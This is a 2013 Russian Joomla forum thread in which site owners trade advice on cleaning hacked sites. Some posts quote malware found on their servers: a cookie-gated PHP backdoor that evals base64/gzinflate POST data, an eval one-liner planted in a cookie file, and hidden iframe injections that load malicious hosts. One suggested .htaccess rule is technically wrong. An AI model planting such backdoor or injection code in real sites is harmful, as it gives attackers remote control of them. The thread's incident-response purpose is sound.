Вирус на сайте, редирект, что делать как лечить!

capricorn

Завсегдатай
1949
118 / 3

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #120 : 10.02.2013, 21:58:16 »

Цитировать

Постоянно создается файл dirs.php

Значит "нечто" создает файл. Логически размышляя, по идее нужно найти файлы, в которых используются команды PHP для манипулирования файлами, например:

fopen
fclose

Искать их можно, имея доступ по SSH-протоколу и используя команду Linux для поиска текста - grep. Разумеется, не нужно сразу удалять файлы, в которых найдется этот текст. Процесс требует размышления. Команду grep нужно применять, пользуясь ее опциями для сужения области поиска.

Само собой, в первую очередь, смотрим, нет ли чего лишнего в .htaccess. И конечно, нет смысла ни о чем говорить, если стоят права 777, в этом случае на shared хостинге при взломе соседнего сайта могут взломать и ваш.

Записан

flier

Захожу иногда
107
2 / 2

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #121 : 10.02.2013, 22:07:49 »

Цитата: capricorn от 10.02.2013, 21:58:16

Значит "нечто" создает файл. Логически размышляя, по идее нужно найти файлы, в которых используются команды PHP для манипулирования файлами, например:

fopen
fclose

Искать их можно, имея доступ по SSH-протоколу и используя команду Linux для поиска текста - grep. Разумеется, не нужно сразу удалять файлы, в которых найдется этот текст. Процесс требует размышления. Команду grep нужно применять, пользуясь ее опциями для сужения области поиска.

Само собой, в первую очередь, смотрим, нет ли чего лишнего в .htaccess. И конечно, нет смысла ни о чем говорить, если стоят права 777, в этом случае на shared хостинге при взломе соседнего сайта могут взломать и ваш.

много всего почистил, жду ... создастся он опять или нет..
права 777 на какой папке имеете ввиду?

Записан

capricorn

Завсегдатай
1949
118 / 3

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #122 : 10.02.2013, 22:26:10 »

Цитировать

много всего почистил, жду ... создастся он опять или нет..
права 777 на какой папке имеете ввиду?

Он создастся, Не должно быть нигде выше 755 на папки и 644 на файлы. Хотя, многие хостеры и утверждают, что "на некоторые можно".

Я с такой именно проблемой не сталкивался. Только однажды, когда у меня на ПК пролез вирус через MS Security Essentials, сразу были украдены все пароли к FTP и моментально заразился сайт. Пришлось сносить.

Почитайте на англ эту статью, как отправной пункт. http://25yearsofprogramming.com/blog/2010/20100315.htm

После определенного затраченного времени вы найдете заразу. При открытии сайта ведь антивирус не кричит - значит есть время поискать.

Записан

DzirT

Осваиваюсь на форуме
20
0 / 0

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #123 : 11.02.2013, 02:01:21 »

Здравствуйте!
Хостинг Jino, выделенный айпи - на нем несколько сайтов. С середины декабря идут постоянные взломы, то eval base64_decode, то редиректы, то левые папки не понятно с чем. Скачиваю сайты, чищу, проверяю fls.php и айболитом - кажется все нормально. Меняю все возможные пароли - сутки, двое и все по новой. Уже мозг вынесло. Два уже из индекса Яндекса выкинуло.
Сайты на Joomla 1.5.26. Решил обновить один до версии 2.5 - установил последние расширения. Стал удалять старую версию - нашлась папочка, которая просто не удаляется. И права на нее 331. Дорвеи в общем там. Ну думаю все, наконец то. Заливаю 2.5. Через некоторое время захожу в логи и вижу такие обращения:

Код

66.249.76.116 - - [11/Feb/2013:01:04:38 +0400] "GET /?do=otveti-na-obidnie-frazi HTTP/1.0" 301 -
66.249.76.58 - - [11/Feb/2013:01:04:39 +0400] "GET /?do=otveti-na-obidnie-frazi HTTP/1.0" 200 6415

Код

66.249.76.116 - - [11/Feb/2013:01:22:27 +0400] "GET /?do=ginekologa-vopros-otvet HTTP/1.0" 301 -
66.249.76.58 - - [11/Feb/2013:01:22:28 +0400] "GET /?do=ginekologa-vopros-otvet HTTP/1.0" 200 6415

И где теперь это копать? Визуально не чего найти не могу.

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #124 : 11.02.2013, 09:34:43 »

Прописывай редирект левого запроса на 404. И сканеры не могут выявить все уязвимости в безопасности сайта, хостинга.
Нужно еще проверять файлы, расширения на соответствие родным Joomla

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

flyingspook

Moderator
3590
247 / 9

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #125 : 11.02.2013, 14:01:57 »

@anthophyta
ваш хостер закрыл дыру восстанавливайте сайт

Цитировать

Здравствуйте,

Проблема решена, уязвимость нашел и закрыл. Для дополнительной защиты
настоятельно рекомендую выставлять права 600 на все конфигурационные php
файлы. Вам необходимо восстанавливать ваш сайт?

или пишите ему чтоб восстановил

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Mermen

Осваиваюсь на форуме
22
0 / 0

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #126 : 11.02.2013, 14:10:15 »

Цитировать

"на все конфигурационные php" огласите весь список пожалуйста

в Joomla это - configuration.php(тут форум поддержки joomla), у других cms они называются по другому
в расширениях тоже могут быть
видел что у вас там на сервере практически wordpress один, и тот скрипт был на нем, вот и думайте что и как ломали, делайте выводы
p.s. не ищите дешевые хостинги будьте себе хозяйвами, vps не так уж и дорого 6-10тр. в год на ваши 3-20 сайтов, не экономьте, а если экономите, то берите только у крупных хостеров дешевые тарифы

« Последнее редактирование: 11.02.2013, 15:37:01 от flyingspook »

Записан

DzirT

Осваиваюсь на форуме
20
0 / 0

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #127 : 11.02.2013, 17:14:21 »

Цитировать

Прописывай редирект левого запроса на 404. И сканеры не могут выявить все уязвимости в безопасности сайта, хостинга.
Нужно еще проверять файлы, расширения на соответствие родным Joomla

Прошу прощения, а как правильно сделать, через .htaccess по маске? Не получается. Не программист я.
Отдать ошибку для всего что начинается на ?do=

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #128 : 11.02.2013, 19:47:12 »

Цитата: DzirT от 11.02.2013, 17:14:21

Прошу прощения, а как правильно сделать, через .htaccess по маске?
Отдать ошибку для всего что начинается на ?do=

RewriteRule ^?do=(.*)$ http://site.ru/404.php [R=301,L]
site.ru -> твой домен

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

IgorArhangel

Захожу иногда
89
0 / 0

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #129 : 19.02.2013, 13:58:20 »

Добрый день.

Сайт был заражен shell-ом. Все почистил. В папке modules было много папок с вирусом, как они туда прописались для меня загадка. И еще в файле шаблона прописался редирект на сайт знакомств.

но сейчас до сх пор пишет в файл логов вот аткие ошибки

Код

80.28.237.227 - - [19/Feb/2013:13:47:49 +0400] "POST /modules/ss/ss.php HTTP/1.0" 404 1844 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
109.202.22.66 - - [19/Feb/2013:13:47:58 +0400] "POST /modules/ss/ss.php HTTP/1.0" 404 1844 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
93.20.160.169 - - [19/Feb/2013:13:48:00 +0400] "POST /modules/ss/ss.php HTTP/1.0" 404 1844 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"

/modules/ss/ss.php эту папку и файл я удалил но все равно ошибка не исчезает.

Что это может быть?

Записан

evgen777

Давно я тут
657
62 / 2

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #130 : 19.02.2013, 18:09:57 »

Все верно! В логах обычная ошибка 404 при доступе к файлу.

Записан

Разработка, доработка расширений для Joomla!

IgorArhangel

Захожу иногда
89
0 / 0

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #131 : 19.02.2013, 18:21:37 »

Цитата: evgen777 от 19.02.2013, 18:09:57

Все верно! В логах обычная ошибка 404 при доступе к файлу.

Так а что посылает запросы POST?
Я все удалил. Все нашел...

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как леч&

« Ответ #132 : 19.02.2013, 18:53:10 »

Цитата: IgorArhangel от 19.02.2013, 18:21:37

Так а что посылает запросы POST?

Ты то удалил, а боты со стороны ломятся к этому файлу

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

art22

Захожу иногда
328
0 / 0

Re: Вирус на сайте, редирект, что делать как ле

« Ответ #133 : 20.02.2013, 18:58:14 »

capricorn у меня на папке includes было 777. я удалил весь сайт с хостинга и залил бек ап. надеюсь вирус на попадется

лечил его рот кто это делает!

Записан

art22

Захожу иногда
328
0 / 0

Re: Вирус на сайте, редирект, что делать как ле

« Ответ #134 : 20.02.2013, 19:55:50 »

так! после удаления JCE. смен пароленй... и все что выше упомянуто... удалил все с хоста потом залил бекап только что посмотрел в tmp 2 файла

j и к

код

Код

# Netscape HTTP Cookie File
# http://curlm.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

www.nonumber.nl	FALSE	/about/	FALSE	0	<?eval(stripslashes(array_pop($_POST)))?>	1

и

# Netscape HTTP Cookie File
# http://curlm.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

www.nonumber.nl FALSE / FALSE 0 cd329a73d596278bdb2e600e055b4141 btdk5vmj16frcpisstl4o8k6c1 -- ХЕШ ЧТО ЛИ??

это что?

----

com_mailto что это за компонент внутри появляются какие то файлы...

« Последнее редактирование: 20.02.2013, 20:32:21 от art22 »

Записан

jurassik

Давно я тут
689
52 / 1

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #135 : 21.02.2013, 11:24:49 »

есть ли какое-либо средства блокирование IP при определенном запросе или результате ответа?
т.е. в запросе *.php$ и при ответе 404 -> IP добавлялся в "черный список ip"

_{на сайте обнаружил встраиваемый фрейм в js, а также кучу левых php
после чистки сайта, на сайт ломятся:
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.0" 404 1734
и огромное кол-ва:
*/*.php HTTP/1.0" 404 1734}

« Последнее редактирование: 21.02.2013, 14:41:49 от jurassik »

Записан

сам шучу - сам смеюсь

Denixis

Новичок
6
0 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #136 : 21.02.2013, 17:34:49 »

По поводу Вируса sejeal
Вспомнил, что за день до отключки сайта из-за вируса, я переустановил K2 на 2.6.5
Была проблема с установкой, на что я решил пока не устанавливать. Сайт поработал немного и на следующий день отключился. Фаербагом я увидел пустые header и другие основные блоки и пресловутый <iframe...
Полез на сайт, как рекомендовали даты изменения, среди который была картинка sejeal.jpg ну и новые файлы компонента К2. Искал решения, не помогало, решил заменить новые файлы К2 на старые... И сработало. Сайт работает как прежде

Записан

jesus

Захожу иногда
126
15 / 1
веб-дизайнер, контентщик. ищу веб-программиста

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #137 : 22.02.2013, 07:56:29 »

Цитата: site-optimizator от 01.02.2013, 22:28:15

Сегодня Google письмом порадовал: Уведомление о возможном взломе сайта. И адрес странички site.ru/?option=/cat/Trebuetsya-perepletchik.html
Я зашёл - а там прямо хренова туча идиотских страниц с машинным текстом, идиотским картинками, вставленным ютьюбовским видео, ссылками друг на друга. Есть даже sitemap.html - там все эти странички перечислены.
...

Благодаря этой твари, сайт выпал из индекса вообще. Вовремя не заметил заражения? и за 3 недели паразитные ссылки типа site.ru/?option=/cat/*.html вытеснили нормальные страницы из поиска. Заражены были файлы PHP, кодом eval(base64_decode("DQplc***.
Но как мне показалось, эти ссылки перестали отвечать только после того как я залил апдейт Joomla_1.5.0_to_1.5.26-Stable-Patch_Package

Записан

Спасибо за freeware!
Если вы готовы небезвозмездно ответить на мой вопрос, с удовольствием рассмотрю предложение.
Ищу адекватного партнёра (программиста) по разработке сайтов на Joomla. Обеспечу ненапряжный поток задач.

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #138 : 25.02.2013, 06:51:16 »

Всем привет!
А у меня появился
<iframe width="105" height="105" style="left:-500px;top:0px;position:fixed;" name="Hemoner" src="http://autative.esal.cl/fai.8JqCe7OVZv?default">
многократно вставляется, содержит ссылки на рамблер в основном.
Проверки ничего не находят. Дата файлов за 2011 почти все.
Хостер не дает проверить файлы на сайте айболитом - типа много слишком.
На локалке копия работает нормально. Синхронизация никаких результатов не дала.
PS
Хостер проверил со своей стороны - большинство js заражено. Очистка результатов не дает - снова прописывается.
document.write('<iframe src="http://rihanna.tessanhuve.se/lkf.uhpuwrDdyF?default" name="Hemoner" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');

« Последнее редактирование: 25.02.2013, 07:43:06 от borada »

Записан

tkav

Осваиваюсь на форуме
23
0 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #139 : 25.02.2013, 08:45:22 »

Цитата: borada от 25.02.2013, 06:51:16

Всем привет!
А у меня появился
...
document.write('<iframe src="http://rihanna.tessanhuve.se/lkf.uhpuwrDdyF?default" name="Hemoner" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');

Версия Joomla в момент заражения, установленные компоненты и имя хостера - в студию!

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #140 : 25.02.2013, 08:55:26 »

borada
Ну точный рецепт лечения никто не напишет.
Ищи шелл, бекдор. Может сканер fls.php полегче будет айболита.

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #141 : 25.02.2013, 08:56:04 »

Цитата: tkav от 25.02.2013, 08:45:22

Версия Joomla в момент заражения, установленные компоненты и имя хостера - в студию!

Joomla 1.5.22, компонентов немало. Удалил все, которые пробовал за последние 2 месяца. JCE обновлял в январе. Через что проникла зараза сейчас не определить. Обновляется она часто, как минимум раз в час - меняются ссылки.
Грешу на то что искал формы опроса и пробовал. Один из них PollXT, хроноформс и прочие. Joomla обновил до 1.5.26 вчера

Да я знаю что нет точного рецепта. Мне интересен алгоритм поиска источника.

Бэкап на хостинге только за неделю. На локалке бэкап чистый, но после копирования и новый файлы изменяются, достаточно быстро. Возможно при заходе на сайт. При этом дата изменения файла становится не сегодняшней, а какой-то из 2012 года

« Последнее редактирование: 25.02.2013, 09:53:22 от borada »

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #142 : 25.02.2013, 10:06:56 »

Ну а какой алгоритм- проверяешь файлы сайта на соответствие файлам из дистрибутива Joomla. Файлов более 5000, применяешь скрипты/сканеры, для уменьшения времени проверки.

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #143 : 25.02.2013, 10:13:47 »

Цитата: draff от 25.02.2013, 10:06:56

Ну а какой алгоритм- проверяешь файлы сайта на соответствие файлам из дистрибутива Joomla. Файлов более 5000, применяешь скрипты/сканеры, для уменьшения времени проверки.

Пытаюсь применить синхронизацию с заменой через Dreamweaver. Но он тупит.

PS По логам посещений нашел два левых файла, один подсказала техподдержка SWEB, второй по аналогии *.php вручную искал
/plugins/system/sourcerer/09e28438d.php
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/zoom/679c0328c.php
В них одинаковый код

Код

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Затем уже по поиску кода нашел еще 25 файлов. Пишутся они рэндомно в любое место. Размер 297-298 байт

А теперь подскажите скрипт, который вычистит 540 модифицированных файлов JS на сайте у хостера

-----------------
В общем обновил с локалки. А РЕЗУЛЬТАТ НОЛЬ. То же самое - на странице три десятка скрытых страниц рамблера

« Последнее редактирование: 25.02.2013, 12:23:49 от borada »

Записан

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #144 : 25.02.2013, 14:39:39 »

Есть ли скрипт, который чистит файлы на удаленном сайте? Поиск и замена.

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #145 : 25.02.2013, 14:45:53 »

replace.php by icom

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #146 : 25.02.2013, 14:50:44 »

Цитата: draff от 25.02.2013, 14:45:53

replace.php by icom

Простите мою непонятливость кто такой icom?

Записан

draff

Гуру
5803
434 / 7
ищу работу

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #147 : 25.02.2013, 15:29:32 »

Цитата: borada от 25.02.2013, 14:50:44

Простите мою непонятливость кто такой icom?

http://joomlaforum.ru/index.php?action=profile;u=87828

Записан

Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart Интеграция Retailcrm | Отзывы

borada

Захожу иногда
182
13 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #148 : 25.02.2013, 15:38:21 »

Цитата: draff от 25.02.2013, 15:29:32

http://joomlaforum.ru/index.php?action=profile;u=87828

Упс. Спасибо!

ЗЫ Спасибо icom за утилиту! За 20 мин вычистил весь сайт! Сейчас работает нормально. Надеюсь дыры больше нет..

« Последнее редактирование: 25.02.2013, 16:32:29 от borada »

Записан

profitural

Захожу иногда
50
2 / 0

Re: Вирус на сайте, редирект, что делать как лечить и чистить сайт

« Ответ #149 : 25.02.2013, 16:43:22 »

Как в дальнейшем обезопаситься от заразы? Я восстановил сайт из раннего еще не инфицированного бэкапа, снес JCE нафиг вместе с плагином, сменил пароли, обновил Joomla до 26 версии. И тут на тебе, ч-з буквально 2 недели снова заражение, снова Янжекс в игнор (денег на продвижение было убухано....). Как защищаться? неужели единственный выход -переход на новую Joomla?

Записан

Редирект на спам ссылки. Как лчить? Автор Евгений1980	Ответов: 2 Просмотров: 479	14.02.2024, 13:15:59 от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit" Автор revisium	Ответов: 110 Просмотров: 63255	30.08.2023, 12:53:33 от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10 Автор Wany205	Ответов: 1 Просмотров: 1010	25.05.2023, 08:49:57 от Театрал
Re: Кажется вирус на сайте Автор motokraft	Ответов: 24 Просмотров: 3007	04.05.2022, 14:04:17 от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js Автор AlexP750	Ответов: 6 Просмотров: 1806	22.02.2022, 11:38:15 от AlexP750

Вышли релизы Joomla 5.1.0 и Joomla 4.4.4

Проблема с id в URL материалов Joomla при обновлении большого старого сайта до Joomla 5

Используем поля Joomla для фильтрации материалов

Похожие темы